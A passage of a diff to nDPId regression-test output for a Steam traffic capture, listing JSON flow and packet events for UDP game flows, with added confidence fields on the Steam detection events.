+00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"steam.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165137,"flow_last_seen":1357332165137,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165137,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.7","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"steam.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165137,"flow_last_seen":1357332165137,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165137,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.187","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"steam.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1357332165137,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1357332165137,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARNw\/AqLyVSKU9u7JhaYkALFeCVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00600{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"steam.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165137,"flow_last_seen":1357332165137,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165137,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.187","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
+00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"steam.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165137,"flow_last_seen":1357332165137,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165137,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.187","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":58,"source":"steam.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165138,"flow_last_seen":1357332165138,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165138,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.5","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"steam.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1357332165138,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1357332165138,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEAR+L7AqLyVUatzBbJhaYkALBkyVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00599{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":58,"source":"steam.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165138,"flow_last_seen":1357332165138,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165138,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.5","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
+00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":58,"source":"steam.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165138,"flow_last_seen":1357332165138,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165138,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.5","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":59,"source":"steam.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165138,"flow_last_seen":1357332165138,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165138,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.133.84","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"steam.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1357332165138,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1357332165138,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARZ6vAqLyV0G+FVLJhaYoALIgdVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00601{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"steam.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165138,"flow_last_seen":1357332165138,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165138,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.133.84","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
+00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"steam.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165138,"flow_last_seen":1357332165138,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165138,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.133.84","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"steam.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1357332165148,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1357332165148,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWTkAAIARDmnQb4VVwKi8lWmKsmEANIntVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAATel0NDIBAAA="}
 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"steam.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1357332165166,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1357332165166,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWToAAIAROdySQpgOwKi8lWmJsmEANCG6VlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAA27XMEOAAAAA="}
 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"steam.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1357332165175,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1357332165175,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWTsAAIAR3ctIpT27wKi8lWmJsmEANAJdVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAA5fe1HLAAAAA="}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":63,"source":"steam.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165187,"flow_last_seen":1357332165187,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165187,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.133.85","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"steam.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1357332165187,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1357332165187,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARZ6rAqLyV0G+FVbJhaYkALIgdVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00601{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":63,"source":"steam.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165187,"flow_last_seen":1357332165187,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165187,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.133.85","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
+00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":63,"source":"steam.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165187,"flow_last_seen":1357332165187,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165187,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.133.85","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":64,"source":"steam.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165187,"flow_last_seen":1357332165187,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165187,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.176","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"steam.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1357332165187,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1357332165187,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARNxrAqLyVSKU9sLJhaYoALFeMVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00600{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":64,"source":"steam.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165187,"flow_last_seen":1357332165187,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165187,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.176","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
+00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":64,"source":"steam.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165187,"flow_last_seen":1357332165187,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165187,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.176","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":65,"source":"steam.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165188,"flow_last_seen":1357332165188,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165188,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.185","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"steam.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1357332165188,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1357332165188,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARNxHAqLyVSKU9ubJhaYkALFeEVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00600{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":65,"source":"steam.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165188,"flow_last_seen":1357332165188,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165188,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.185","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
+00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":65,"source":"steam.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165188,"flow_last_seen":1357332165188,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165188,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.185","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":66,"source":"steam.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165188,"flow_last_seen":1357332165188,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165188,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"68.142.91.35","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"steam.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1357332165188,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1357332165188,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARHb7AqLyVRI5bI7JhaYkALD4xVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00599{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"steam.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165188,"flow_last_seen":1357332165188,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165188,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"68.142.91.35","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
+00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"steam.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165188,"flow_last_seen":1357332165188,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165188,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"68.142.91.35","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"steam.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1357332165226,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1357332165226,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWTwAAIAR3dVIpT2wwKi8lWmKsmEANKPuVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAASRKpercAAAA="}
 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"steam.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1357332165229,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1357332165229,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWT0AAIAR3ctIpT25wKi8lWmJsmEANNMtVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAAPeyXWaUAAAA="}
 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"steam.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1357332165230,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1357332165230,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWT4AAIAROdeSQpgPwKi8lWmKsmEANLvcVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAACGWHPF4BAAA="}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":70,"source":"steam.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165237,"flow_last_seen":1357332165237,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165237,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.13","src_port":45665,"dst_port":27019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":70,"source":"steam.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1357332165237,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1357332165237,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARkx\/AqLyVkkKYDbJhaYsALLOQVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00600{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":70,"source":"steam.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165237,"flow_last_seen":1357332165237,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165237,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.13","src_port":45665,"dst_port":27019,"l4_proto":"udp","ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
+00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":70,"source":"steam.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165237,"flow_last_seen":1357332165237,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165237,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.13","src_port":45665,"dst_port":27019,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":71,"source":"steam.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165238,"flow_last_seen":1357332165238,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165238,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.170","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"steam.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1357332165238,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1357332165238,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEAR5qjAqLyVRRyRqrJhaYoALAcbVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00600{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":71,"source":"steam.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165238,"flow_last_seen":1357332165238,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165238,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.170","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
+00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":71,"source":"steam.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165238,"flow_last_seen":1357332165238,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165238,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.170","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":72,"source":"steam.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165238,"flow_last_seen":1357332165238,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165238,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.15","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"steam.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1357332165238,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1357332165238,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARkx3AqLyVkkKYD7JhaYkALLOQVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00600{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":72,"source":"steam.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165238,"flow_last_seen":1357332165238,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165238,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.15","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
+00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":72,"source":"steam.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165238,"flow_last_seen":1357332165238,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165238,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.15","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
